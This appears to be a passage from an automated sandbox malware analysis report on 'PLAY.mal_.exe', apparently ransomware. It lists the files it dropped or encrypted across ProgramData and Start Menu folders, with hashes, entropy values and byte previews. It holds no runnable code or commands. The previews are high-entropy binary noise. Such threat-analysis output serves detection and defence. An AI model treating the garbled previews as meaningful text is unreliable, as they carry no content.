{.Eo.k..p...~.u...I....`....a...C.J.r..ZuJ3....u.17......=.w

        C:\ProgramData\Microsoft Help\MS.SETLANG.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.87652127413153
        Encrypted:false
        SSDEEP:
        MD5:E8B4FF3E8EE6335D4D3FD044772DCF4F
        SHA1:31BA60430A500DBD6CFB4594A23D090728C23BC2
        SHA-256:5818BDF05F17A902734F351E7CB9CF95E7ACA6AD397CE3B6FB3CF9985CFFF9A0
        SHA-512:8A36530EE31BCEB91AF3B071E3D4D5C8F75C625588ECCB28722916F0A15D47F82CD314B0A24CC47405C7030A4A641D7BCA1972DCE6BA7DBE26A870DAD627EAD8
        Malicious:false
        Preview:eJ.LR.U.Dz#..R[......l.%1MA4..#G........Sf`{....U@'.+..L......#.P.g.N.px.Kp..7.G}N;7R@e...)D..o..X.N.....2..#..s.2..@o.t.,...:..|{.o"q...Eqp..z...H............_l../P....l..X.n.y6W=.:...N.b..zoya..O....I....h......RA.^....[.............k.\TQ.V.c.k.......iN.H.}.y.`........F.^or...N..9.d...-....G.D.3.:+?..E.....<.14....(.R..5.w.U..pA.X..W...l4....XG.. .....T..U.|.!.I>...........................m........R..J.6..k{.iI....u..m....8X....'..2.._C1..q...O.gu...Q..c_..ZJ...{X~._S.H.|.*.K....o.<,5....y7?...=,...?:.`.)9..g.\....g.....x:.:.8.^.xF... .q. 4......*If..l.....J+'.....p}v!.(.3G.....=Ag5?..=t.<.Dv..E...h)..e.]..Sv.dh$..-W..^...zM5.w....:.fnLu....T.@.K.m,}O.i<......{/]D...."...%..R....M....@.mF..r9v.h..f....i.......iF..9...C.He.7j...F........w!...1q.a}._..[.".9]I.bP.X..F}..$..$..e..~............E..J.K_k.AR...o....v1d.#}(^.s..+i.....r.I......h)..M.....K_......[.0........OO.|..?..t....8.@]7c.V.}..2y`....=...K9....a....f.D..".A....u...u-..V.[hp;..

        C:\ProgramData\Microsoft Help\MS.SKYPEFB.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.859536442968976
        Encrypted:false
        SSDEEP:
        MD5:6E9FDAC0A8A1FDED48604D7493ECD4A5
        SHA1:9CA6D88B2027BA3DB40908B7DEAD652E9F5A5683
        SHA-256:F6B7DB2A8A15425FBC9D8DA3C9F73399463AF66BBCD869C640F1B33746C8CF93
        SHA-512:9A4FC99A99EAC9B7B0CB00CF21DC04324243E1BFD52EC70F17CE23E0F17422C9535557D5A36ECF466385D94CA36673A0A3D7991D7C1307B6D89499E42299171A
        Malicious:false
        Preview:..*.W.G..|.........."..>eu"e....W.....<xb...'.o$j/}z...=.y.`z.[|..X:...,|...v..e.W^.W.@.9..... ..yqP.".T.T.....c........"...5..h.f.N.d...\wv.........N.N.wE\..BD.F.|F ..7'..".....`.v..&o.0..2~.............*'d..k.H.v%3Y@o@..zf..z......,.S....:6..9........05=oZ..4.l..@..H...5........J.a.Uj..|.0}q.t-$a.'7...k..tR.O.&)..2.t.....K..{Ceh.E.k..und.`..k.c~.........T..U.|.!.I>..........................5+s0x....zQ.z.......F@.?..=...fo5......M/.I...b0k6.K=..F`dl......(....B:...|..)....bt4...k.+|.....y.(.v.=..u..N.x....d.k.....YG..../...;.R+.....`/.a.N..6T..y..].-K../S.-kS..8.u.K....(.k....2.;.yx[.]P+...|R......B.<AY.....y.&.z.1{.4<.>iW.%.<.o"...!(..)...=A...).4 .u......*.Xd.C.p...1o..YmIf...!p.s.....O...b.\.B.2..$..|.....9{...$..]...d.>>.....N..N9g......\@...6..{.....k>...>.R..`5@..>..l..<.."..\.Q+.*.x...I..2y.3.........y....I..[#../.......qJd..2..i'.......1.{&3.....8E.i@..|.~F.c.a.4.xY..@.&.KM.*...t4..r..)^.O.XWZG..M'B.c~...`....{...3....E...D....t.

        C:\ProgramData\Microsoft Help\MS.SKYPEFB_BASIC.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1464
        Entropy (8bit):7.821088873818155
        Encrypted:false
        SSDEEP:
        MD5:102D4806F41008AC77A2D0EB367FA949
        SHA1:7E4A1ABAC7AE854BA509ADEEFC25E6B71DA0756F
        SHA-256:D3D9341175C513D1E122DA7F9551C6EAB5C90E760D18AECDFE3690DFEE80405D
        SHA-512:5F5FC6D9597C35E6EF56849B8B8AC5B1BE8A25202CFB8F09735C1A11D54CA1861D169BD74960EA047F1343A2FA37E00EF0D05F54BE5CC47D99F32769F0F4CD80
        Malicious:false
        Preview:e7oxA,.S.....`..! 5..........uRBu.j.e..G....eM. (.c..?.oY.-]....=.G|....u...V.....y..O.c..h.x.....w.6.....>..j.....+V....}.....C ...^\.... Y.%.....&$...!......}.t.B.ha...OO0.K0.6...|..m.Q70..?xO...1)a.S...........!/...W=X?K..#...5\."....~=..4.>...!.o? s#....*.Lw.K...^...@W.......F..?{.....$MZ....".t?|6.L.....X...wr....Re.)..An...96..T...y%`..=.F.K.d.......s.fI....W.-..bO.y.e....T..U.|.!.I>..........................]{.......bX.+.....P.........a8...........E.8....F<.d..J...k[.V.........R.x...$.H..@P..%....dW.c.........R...#L4+.^.-..j.m.XH.... g.h.......N...P&2...p.9..p@8.[T...H...'....A.n..n..{.....}M].'(.i../...........z.?...*;.G.......k...i...?..v$...X..0..!.p.8..-~....X....r$`c.Qd.6.p.'.1+.ctnQxMKN97X..X...D.$.N..kZC.....1.{.p...[,FHd."...0Un.>..=......ur....2.s...r....yO;.....u..?. ,...#....J.r.y80.,J2...|..($..a....Z)q.P.W....K.....H# .bruyl5.U....P~R.......N...@......QNaJTNk.gG.h....V.).5.#T.g..;~&.Q...t.i...Y..W....cG....>....El.L

        C:\ProgramData\Microsoft Help\MS.SKYPEFB_ONLINE.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:PGP\011Secret Key -
        Category:dropped
        Size (bytes):1480
        Entropy (8bit):7.856510921499888
        Encrypted:false
        SSDEEP:
        MD5:C36CB1585CC8D853975BC41162F7B693
        SHA1:6C33FB86E19488C389257B5CC32E50EAC4C830A2
        SHA-256:07782C4F92680440FCE0248DF59F0CC9CA0C4178474623C5E0720F511DE0FDE6
        SHA-512:4280D0F3B10634EFE31FCC28803B95878CB455CFD36AFEB036A5AFF2ECCE61F4099AEEFA9A42F57EAF75D7BA68ABDCAF312EB76C4B56F48433061A0A9F73CA6B
        Malicious:false
        Preview:....B-..lP...`...[.SzeZ...E....M.oMJv....s....7)Q.^.Y......3.......Dvt...l.....@.,...Aq.uuD.:..L.....H,).....&.#._...M.Z.s..J..cL.l.....#y+.&.a...,.....}...5{Exk..h...B....tt9...)S.o~..q.O...}...x....r#.}...>..).g.\?....$...@..VF...*.<s.8...VZt.|?.....I.[H...W......I....M.....(`..._...(..$.;.},H.f`.....;,.M2.-h........c.d82.@.dj\.,7..d.Rd.Q..T.-......._$..3...~.?... ..[.'.=n.L-0.p.....wnh..1....T..U.|.!.I>..................................8.......4..G..H..ph..fH.N.'\...$eB..U....G...cR.......U../.^.xx......-yl.)...-};L.e....2....{..T..{....E.....yE$...-Y....$..!.K....m).p.^..Fw...3k..Q..B..-[J.....D.:^......% #...F..Gx.^.4O.$...4...S..6.:.M..y..|`(.g.4c...Q.. ..S..u"1D....S(=t.A.....I.1....Ap....m..[Ur..w04.XN. ..2...".3.d.a.%....3.&.W`J....b.....D\..u..U...I....a......:.R..r.f....Cm.....w.Dx|[.._..^t..2..D5x.d..z...u..=.C[Q.\..........o..~.p.?}.J=......._.....#\.I."..<.....+.FoPj.......w...%.D.L....c.c..4u.oNe.J._.._<p4...x..X...q.d!1I

        C:\ProgramData\Microsoft Help\MS.SKYPEFB_ONLINEG.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1480
        Entropy (8bit):7.870765720216567
        Encrypted:false
        SSDEEP:
        MD5:8F0B6BC86A929134372F07E2C86B547B
        SHA1:E1D1277457F488AEC6054D0194B9C9AB0C12C571
        SHA-256:35A2C988EEF7E8E0281AD24A6BCBD048EB8BFD6ADDD323F249DC1D481B82E57F
        SHA-512:72E18F491F9944D059880E7D67DAAEE36580901C27FDB0B797439012E4F4641F3B25C76B42EB82C5D8AE52BE5273CC873BA5C861821B0FEB1405B2F9CE4DE922
        Malicious:false
        Preview:.4d.@..........x_.>mr.M.r..aR..Z{..!...=.*...........B...H.....qAf..X...wb.t..T....d.F...b!.]U-..L.>...c.7.....3w.f..).....x@....a.yys.6...DO2.Wbl8O#.E&. .YWo,...........)...8.............|............]?@.....F#...]?'.....\....`..a...Z.4.cEl..5W"(..? (|.y..{..X8..=&.c.P).m.t..:.......@..N^_E4..>M.Jm..... .......#.....o...8..Vh.L.nt...\.3..3T.Z.X.....eD.b..4O0-.m.:...........+.....G....T..U.|.!.I>................................H..Zo`/X.?.M......W.0H6:.#.@.h.A].#l_.A.f...p.[...@/.A{...?..X&c.Y.........@..l.q..?...=".d.q]`h.f.Hs..V.g.......3..)...+.......*.[.......h=m.w..!.}...u"....oP u.....c...d...k.S......"..>7...?..<.....Hk!.htf5'.V..n......]{I.1.....rY......s.,..........j.sA.ED.e...<.F..'i..^.y.'.L......S...$#.....R...<..QR.2...mO..m.^t.6:.-.r(..A).c8]}0...z.0..H.....mb.a.M._.i*.Qa}y..O..:..pe.p.Ge.*./..b0..?...F/.l....ade..2...[.y.Z.9.q..|..A..eS`.......U..t.y_}!.;...u..2.......bs..T.Q.......I.n...a"Xf"u5~.......E..s

        C:\ProgramData\Microsoft Help\MS.SPREADSHEETCOMPARE.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1512
        Entropy (8bit):7.875448275379418
        Encrypted:false
        SSDEEP:
        MD5:4A743485F17CFC3D0CAE4ED528F4AFA7
        SHA1:D4D053912966B6E0A37B6B0DFBE2948C061ABF8A
        SHA-256:3405F040554E016AE7113C9B324595A58BBA4F4223143FC45574B8B08B457035
        SHA-512:40CC46207BC08F83AF8AC6E55956360BD08B3C394768BD8A51D8F791F573B0071B5160C155EE46041035B9F9604FB814155AF85DD2249CFDD77C9D51D04E81A2
        Malicious:false
        Preview:B......l.|.gVlV.6.l.t....<.JX.d9...>h.....s~R....h-).K<..v.x.4T.Y.X.......K.....2Y..J.Yx.T+....".UH.y.x..F.!r.u.T.P...bk) )%......X...=....ng.]<I.....6X.....`...)eU..]........>..........99#.?.S.......#.._.N.<~...c.e....P.o.+...Q.....T.#..jcAz..},d.-..........i...r.g1.BV..&rw.....>.P...j.?I....>GN.O.[U..1.OzA..2v.....+....t..0)..{!..'.+%....*z....a...._..`....g....2......z2.......A..N$d..........%@q...g...1L...........T..U.|.!.I>............................n.(.X...D...cI..'...!A......r...../.....E.r4U.@1.......nLt..E.`s.]....y.r.!..........'...[.>U.Aw..@.8..N.h,.ZF...S.0.`R.;...k.qr.5H...L.N.L..X......'(..v'C..d..M|9.....r.........7i(.....(.b}51Kp~!...4.......Zv.zF$...`......q..y.........z`..~..D..x=.6.G.5.E(W.'.^.1.Q.:...7..,.>?....U#......vf#=K.<._!.e5..O..g..w...E.........W...tl...S.o......A^4.=(9n.Q.%D3..Hj<.u@.K.T.+B......nJ3[%'6Z......D..D"l........F.........2.V..#U..|.f.$...4"...r...{*.m...Ke..y.}hX.....5.y...,ze..B.[./..KJ

        C:\ProgramData\Microsoft Help\MS.WINWORD.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.858083053598704
        Encrypted:false
        SSDEEP:
        MD5:25C88F1AA76540D7965BC53DB915B051
        SHA1:2E2CF19305DA3A346EF4002F0A487189CCA5DA21
        SHA-256:1DF23F20FB094900938E9A0E3F9F80A03BA06D14E7165B6EAE6BBF5F76FC8D53
        SHA-512:B7489EE5777FF43B259B031500959F59F069B1A70D91883EB40A6F118D477A65F473D9626ACC482CB66A12A45B921C27A63D03017BC026B909875E78A90164E6
        Malicious:false
        Preview:...H.....-}....C1.,.....c.H%i{.O..K..x.%....y.......tiu&.:..:.....#...p.~.Hz..x.[..3.g..D.........*....Vo..A.....x..A..~./:.......k.~.5nC.!k....K.B.A_..+M.....@3......A-fe. g....G^.....W..kFH`p.s.........Ni..3.V.J....mq>.t\.2.`.&E#.k...3Z....Fyx*).;...(b=..G]..?.........K)NJ....;<......*Jzq...6:...@....-....b.g....?v.n.5..u...DB..D....\.`.Pj.]..T..U.|.!.I>............................x..j.%..FP.A.j..p[\..yz.......c_..!..5.......}..`s.`.A..8wgGO..isz.....c.&..b..p...j.....i.r.W...L ._B6.b...A5.n...7;D.."..1.jE~...l.Y..:'..c..F..w...c..I..yW.....?.N<#|h.^G....4.q0.d...J2|@tu...#.x(S......K.7....'..dz..q6W-.......9..........+.nE......x.....x..[|...=..8.w.NE.oE{......?....E6.??.9 ...d_....&.h....%{-.r-.S.t..y..........=...D.{.m.......*./..1.8.'SW.<O# .D.N`_R..k...h......jH.,1Z..dv...~7.""7L../u..I.w...`a~|......R.|...~..)....x....?[..P.....]@Q.....#.t...qNA..Q.t .>^.{x/..G....MO......m...[~Ha...]/....yEgP)..9Jo..Q....>7..

        C:\ProgramData\Microsoft Help\nslist.hxl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):7336
        Entropy (8bit):7.975258605104679
        Encrypted:false
        SSDEEP:
        MD5:C0F2EE9176DFA80ED34A003A1181A35B
        SHA1:335FD56936DD0FBAE86B4043566370C4F9ACB38C
        SHA-256:C907184065F1710D5A1A1DB118ADAF6333689736754D3CFFF67D6A7111CF9C5F
        SHA-512:FF79082A1CAFF75C2D8E7FF4B6220E5B6007CD4B12384CDD950593E8AC35AD5DC1556130C00E2DCD6C3229D89E73DDE781E12DC927F4787160DA5784BCEA3BB4
        Malicious:false
        Preview:..}.R.7l.'g..!.....2S.L..T.cr..>.Li....KDr~..'`#....R.._$..$<X......gVV..=.T!..8.S...y..A.......m...Vop.......?.K.I..^..v.3.?p.B....cQ9.(...=.j.Q:.6.U..9.S....[+...a..}..;....J....A..2..gu.@.>..~eQG7..(.B..V...~..{.#C._.N......E.l.Rre.E....eE.....Tb[.<.3..f..*...T.....@u...T...JI.^.............v~..i./-:...,6.2|.i..Zo..{.P..c.....L........(.....)Ib.f*.......%.ON..(...<%8.u...Gb...b......Q.}_.@)_.......3..-...<.3........h.s.M.{6"Z....,./Y.-9.....t^U.L.z.b.y..w.7....M.....9..Uw....W...c8.\@..?.....$.<.....N.w....B%....e......";VJ./....T.n...$.....3(..,oR.)....Sj....=_.....)kg.A.!.4.#6@..G..........Lx6...YU..27..G.7..1.wg....].p_......m..d...B.T.14...z..r7....jdJD.I.8...Y..g...S.lPx._.............T..].....p.5.......(..c-.^.Xn.O.l[T....k+..:..lM....v`..iYS..Ik.PF...bu5fC...$......MzJ.{.ru.,..\..e..C......_.......o..;.K.EF.s}L.^RzD..20Bd...a.v.iOHA...P._....(..-...@a..........:?{W.h..z....v.}E..M...8.E.GRF....-..p...eqrU...{D..$0f....

        C:\ProgramData\Microsoft OneDrive\setup\refcount.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1096
        Entropy (8bit):7.801465299830693
        Encrypted:false
        SSDEEP:
        MD5:03575F11A9393686A100B9C37B156C49
        SHA1:DB61812D9F3A5D337B2BC5291816721278B57210
        SHA-256:A1A5ED78546092288965D44BC58C2F948E4C45E88AAD05F68FFA3C4A32F09779
        SHA-512:62E1E8CC88B8597FB741B3AF7925A802A5272E07C42ACB8F210F203CFF67B58816E8F4C581811814DCE81EC7F6A069FA25E21A6F7A7324CFF25DFB7AC5ED1D98
        Malicious:false
        Preview:.......t..P......W..2....I.*...T..U.|.!.I>............................._+......w...N......U[.....Ed=...}.{.UH....A....."a....q7....,........#.j..........HhV.#X..w9F...?...../s.|).!........hn-df.Nc...b...B.Y.*6.Q........J&.Z4]2~.04]|r.......6.A..I...U.%:.v|E..]........@^...P$qH...C."g.7Zzu..4...-.lu^F..I.4....6CMZ.Y..(..bm..F5.vwY.8?bQl.7.....*.<..$.....=.;.....0.S..WZ......._N8{...v.GL..K+T......6.@?.F...h.hWL..;...Mh.U.Z..t:...H..c/.{..4..y.t".........,4...}.mA.....U^.p..A...jU4.\JW.y...X..p...ZKx.BsC....f.......#.!,.dI.&1...WI.......5._...[..g....T.\6o.v.;.h[u..a?..$....2....YD.r..l.D(AW7...%.-..<.y.V.`....p...Y+..^.>!...B.+M....0.S[G..|."...7.Cb..Z...q.../tu....S..*i....t.p..8.b.-g.?.1.#c.O...g[X..2....x.B3.F..L.V...4sdMa..@..E.S...7...F.h.d`.@t.h...^>..E..m...).s.v^...I3CKi...dQ.$...q.'.....(.Y..0..@&.j....Ye.4..%t.....q..[.Q.G.:%..~.=..,...........X...8...~.._.....9.YM........6\pC....>.....C..D.x.u..ZS....e..Z.<.....K2.uk..^.Q..DU.\q...>..a....B

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.870184159228747
        Encrypted:false
        SSDEEP:
        MD5:01B4F79939C8BC75DE609CAE7E76D4A6
        SHA1:1B6C9177367717D09BAAD1CB8FAB3435CEDAD855
        SHA-256:C6D096152F4A1B031C062735D02A3CFD49C2E165D158A93D777F3FA0576C22D8
        SHA-512:CFA0B530D08949DB0373F8CEC79A472FB755B09B3E4D07ABFEBFF096ECEAAC66BFCCF02B958B600DA0E38F87BE7B88ADAD2803ABE4034CC7B1C524DC6C4FBFDA
        Malicious:false
        Preview:.&...cbXW.yY...j...|.Lhq.R...Vhq[f.C..z.M".l.].....c....D,y.....g..........6..p.-......v.5.r.....9........].e..6..W.l.g......].8..1.I.\..1<..G..........];gD.+..(.y...'..!..+.....=...||m........C..M.R...c.*x4x...9.i...U..,.^.Qn.;y...N.C{.....dN.9.B47.k@^NH..N..."..C...6.....b%.!.1..$.|.Q..@.O...a}..(...0.g,x..p...52..w. .xF&....:u.v~Fx.T...[..^!.c.l.../.~.[.j...T..U.|.!.I>..............................*..-G...x..5.i.....E.....'&r85..}!,E.v....A.u|u.h..X..c..(.?.j..a.mT.(2.j..q.OQm.$.......9.....1iJ.O...".~.I......x....`.\....L.s.).....R..(7..8....'.......Oy.@h.-.]X%...e..9b,..$ap.......t....n..wk./=..<.N.G..o.d=:LR.y|.........=..Z.p....nR.Z....+A.....Y+..j0..N1...D...<l50WC...:.m..1y...l.L.]ha2s.....*.<..\..x........Zm..9W.1Y_D.....e....e;y.P3.$E4..cOQ...X>........D....6X..i..{Y.>..W.z)b...eh..Bc........J@.&......I...:y.....@Zl2\...3S.v.O.E.........:........X.d'.g=.=.....i{...2..893..R.K....]d&..2`.&M..>.......v.o..+74....$."..`.....

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1160
        Entropy (8bit):7.845543767503856
        Encrypted:false
        SSDEEP:
        MD5:DA6A758BC2F753E0D263C00A8AEAA497
        SHA1:431C6164F20C23FAB6E9495EDB04A42D89DF5088
        SHA-256:67622EF2D1738923B368D861B2EA5C33987BC883541B7DCAC8329D4D677B5025
        SHA-512:CB3513E43C52A70EBC82AB1843F7FE352F95715260686A8874943F9DA93BE79D0EAB7C80C82D5DFCD47DD240CEC7088533FC5B7D73FF085B8CC60FBBC89A8EEA
        Malicious:false
        Preview:^J.]?c..Fi>J.3wz.C.+....!..M.l.:...<..z...'...:......{K..+..x:b$h.W.{.~..;...$.k!G.c..tQ.)..~...T..U.|.!.I>............................|.I....\y.|.]..X.d...5..Z..L.kj9............\.Y/5.O....\..!x.#..ZT..I2d.l.m.C..ap.`.....9.$..m..z...N..6..``..74K.,%....{L.(.A.R.A......I@.....6.'Y)...YwR.pXnOh...k....ps. ..`.1../..G8...e.J..4....y...*..QQ.\..Y..T.......`.Q.cH.[\^.a.... 2..F..a...y{....t...*..(&.P..P0..E.\...2..g?z...]%.o=..B.d....!q......v.$.T]'C..i.6......H.\R))..Lu.\e...D Bcm..:.+q%9v.......<...../..j.....P...N.g.v5.d....>..... =;.....X..Ha.G.[v.#4.s...~.i.....Vy.....y.y?O~e.4.|........i.i.RnH..[....b.D..x8Z.r..-.O8r0..f..-....`..........3e.k.+5...6xA.E...hS....}C"p...F>.G.5.A;.IS...E{.qf.....Qj..I.b...*..V*=.Li.N.@.:.cS..1..p.mP...J.........o.8...6..].u3,s....^.xdXh_[..S..V.+Q.y.!..*6'..*....LR.m.F..k-...E.{.....)...K.m...q/.a.,...C....<Cc;.C$..L.9..K.,............A...8.i.......:.H...7.d_w...7&&.y;.$......ve.0.cS..X>.f....H.P..p.....!6

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):2440
        Entropy (8bit):7.924204299775155
        Encrypted:false
        SSDEEP:
        MD5:9BBE0248E41922FC2277B5150A468D0C
        SHA1:C64C279566CC36961AFF341BC03C560AA42CB57E
        SHA-256:73C79C43739188C3CF8FFCE15DD196BC54460E002B6D1D24F444E66C12DCC5CF
        SHA-512:1D625EE98FD53A5C0BDBAA4A6BD7C95F1A94FE13A789F20C7BD1C2B4E2023863DF0D42DB09D27697E832DB24D22ABCF831F2864D3FF12410DD87CED1D479C5F5
        Malicious:false
        Preview:.}tb...&`a. ....y$..E..#.Y......~........m.|.@r]...cn....d.a.$...Ld.c.].....C!n*WS..#..g<...-......M)..S$o..*.%.T......h.o..r...:=../...[s}.Y.5.1.<.1..2.,H.gzN...>....q....+.....T.+..W.i.%....L.b.c.f(4u..'.....xU.....hyyf.}.l.....O....x...............{s.%...#qpa..wUh$..=P.8.'...b.G.HR..?.v....{:L2(.s.t.&.z...,O..Tg.'.....L..M.].E...F..bz..L......;.*VP2/^.V.)g.^.'...8..8Z2...L....&.P.....h..7.1.9...zJ_...<../.w..-d.`..@..-..01.....?k...d...V{....J.c.)J.....y..|.t..A.D.A!^...T^.O.Ia.5<o.r....&.0...^,@...I.2......&!/.uQ........1..76...aO.5.po. s....nb.0L....e4h..j.o....(..P.`....!...y? t..C.|d.?.....c..p`.e#.....Q65.,..&.C..83.X.B.dN.....S.)...r..L.4k..H.A...$u.{.{H...EY.s..$j...a.._W%".J.+....Z...v.&..jF.G4..2.d#1.O...(..%d.Xt..u]y.Po..1f...:..%.`.7....Y.x....+....C.!.....1#;.ez..B.R.........'P...2...{..v....M.3 ..z.......-...>.5.V.....wvG.+<Z.w.$Z.a...R)W..CR...R........f......}.y..%:.......w..g..Jlo....D(..\gxX<n?.y.l._.h.b:.....O.......x.0J..m.

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):3816
        Entropy (8bit):7.955760018314402
        Encrypted:false
        SSDEEP:
        MD5:C8E9B150CC990AA2EF3F9E42679A84FA
        SHA1:6C1E21302B4A1DE11567DB41B72E9EFBA9A5E9C2
        SHA-256:E6AA5A0C8CAE4F9BDCF59B033099064B49CF9C1576DB47872FBC1C6E7765F190
        SHA-512:E006CBCA8BB8B95E1B5E6FF6DDBA32297A974DCAC732963AA8418A88F3697E29236BEB6E7658EF0F57672B8F515001CD4923BAC53B05B18E9ACC1E74A89000E1
        Malicious:false
        Preview:..S.......%...1..t..8.+.v......W.<.7:....M4_...........L#.....h...]..VV.._\.......Lc.\N....mB.<...A..f.6/..e"..V..k.0..9.N.D..+".,....X...?...Ro.y..q.|...e.j.w...(._......i,.....N8{..JY..w.p.)..Z\.)...*U...j..'.......dE........]K..q.A.v.Qq.......4MQ,..f.r.n.`U...5.....v....~...(.WR.^..L..B."7........-=.. ..E.lZ.....n..?0......#....7....w....D$f(..{K..Z.."..e+....x.he....q.u..H.j.B....?.. ....Y_B/.=..b:.Gj....1=.. @9-3.y{..}....8.YbK..:~.o%Y..Q....=.H.].X.V.q.sKR....}...[.R.{...~.f=H/.:@1.57......;!hg...K.N4..:......C&...U.......'..C:|ziX....D.^F.A1\.T....p...'SZ~.F.....[M.....t..K&Y.!%......`.......`.].=.b.7vDW..wd..s...D..d......*.APp.....+.G[I.....(.[}U?..Cz.../..<S....a...`r96..$.....ER.."H\P...6._.. '....Kv...=...6R:~.\ra..%..n7.........}..*...4+.4r..z..Xg.........K.'....R7.......I..c...q..Y..J...J%C..z..#.EH.O.`.D.Lt..D.:...sy....K..E..7k..u$.0R..k......'.@$........}..#~.9k....g/..p..-.....|.{.:.k.Odt..V..Kf}.1Mr.S..G.;....

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1256
        Entropy (8bit):7.83695588511468
        Encrypted:false
        SSDEEP:
        MD5:57A89A394A7F0399161AB24A627E0CA0
        SHA1:16E5B621C3F67DB4C5A131C720F57964D1556505
        SHA-256:81A7E73C685D4DBC3E0AFD31247F74C3D0ECEC2DACC370DD2C304E290CBD2F09
        SHA-512:C75780F924560062AEF155BA660B84A3145A5D79059B50FD3FF2CCD3684DC8FE03239AE3221D4219187BDEDAE65166E13777167A35EE1206A2F702BC836B3AD8
        Malicious:false
        Preview:...h.H6%.Y^.y.,.+*.^?.I........y@uiLwn..k.@...........Z.m..d...r6....f...N_.^9...,..)8.%.F?.8&.@.......x.{.......=..w...B.XTk.`P..a.....py}...KR.<......: .....)G.....P8/..b..4J8.3...T..U.|.!.I>...............................1......X..!..BX.&4........;.9...3-.N..<D....-w.b....8...8u....~.;<...06S.(...+.U....2...P..3+$E..'...Cjw.c0y.|...i...|...v......B..xI.....K.....&...1f..cG.7)..:<.....@C.i...v..w..*..R...f.C.R.7.c...p(.#..iT{.'8.......V\.>.....R.>..F.]*.U...-..o.[P..../..........oi.7}..d!.....~t=S.y..*...._.g.u..;5.&\|...i^../....S...s.....T2Z.......H...c4.tZ......^i.L/.,~..hd.dY.......`..EG...zI..z.DBs.{.KIR..M...Jp.K..w>..\..&....wOf...0//5.c?..Q.%.=.D")..c.'ev..&.G............b..X.=E3.."... l9..Gi...=..R$......Pe..TQ......H.W.......n)....[W:.O_.,Y.o...e....|S.t..t~.[.......y.y..O....u7..x*6.].>a".0.....A[..>....../f..S)..(.MQn..4.......Z..yW.w['1.P.GZ.}:D..U....Ji.....[...}..).d...n.....-.......xG..f..j)8.m....C.|.<o

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1256
        Entropy (8bit):7.8376279824532205
        Encrypted:false
        SSDEEP:
        MD5:7F21EECFFD443FC58C1BFD3F69224C12
        SHA1:A0F54C57E9DD3D87CC1215C85CBA9CF74E516F78
        SHA-256:0CB2900849CE56FC64DC4E49697643518C1C72C31795D5C7C43EC37268CD8CB9
        SHA-512:FEBC70439C0D6C31FF2F05C7D1BE0552942852E7505C1844416B68D956EFCEE4817026240215129295EAEB33A926871B7E4D640FD38FFA98CD5C43E75DB5DA87
        Malicious:false
        Preview:a...|.J{.M..u..b$xW..FW\.>OdGqL...w..qm..i..>....{&..*......).K..p..'....$.................t..n....h..T.N..w}......>~~.....J.9r....v.tm\....8...}....=.?.M...T.`.z..~..u..f1.Ic.....Z...T..U.|.!.I>...........................US..$Q..ed...?..V..+5,."....%.&z.p.x...Q .)z.... .D..V.V.=..c.n'.M=...\.?!..........%.......FM.#..VH.EZQ...0..{U.nez+.......*w..b...x...Q.y.<.y.-.W...9WYL.-,.U...&f.....;...T.Z.jn..Y.h......&)..$..3.t.....{x......D.m....3Q.....L2]k~w4.<.|.W.....a.n.3E&.......@..Z...*v.....7.|.....]'....g.UL...`....k...N..`.O.V.."...1.........1....E....... .k...gNp.t..)...#:.X..4..c.G.9......uuw6q........ .'.6..7.c.O!.P.BP...yg.&pz 9N...[.&.!....a.....T;.R..#jv0Q.T.[.H....%r.jJ......n!2.....~.....?.......yhR...DH...E......eT..$..g...,)...V..v.....&"qh.ejK..............r9U...~.p/.K.R..o...We..dxp.On....2.. d....9.I.*M]%Z..0.G......FKq.C.R..i.}.#v#..X......\&J.....-.....7..5NX..R.%Rp.....1O4..'.'...n9K8..'.}....S?PN.4.l.LH..<.....y.0...

        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1240
        Entropy (8bit):7.842681093540845
        Encrypted:false
        SSDEEP:
        MD5:D7E0E64A051DDE1DC9F23C23351DE907
        SHA1:15E7F96CDC08F7FC0AECBC3453E1D73100D17C4C
        SHA-256:8A8BAAA4A3C99FCE2A1A46F0BDC0157AD9A83DCD3BE994C122996A68D0FDC852
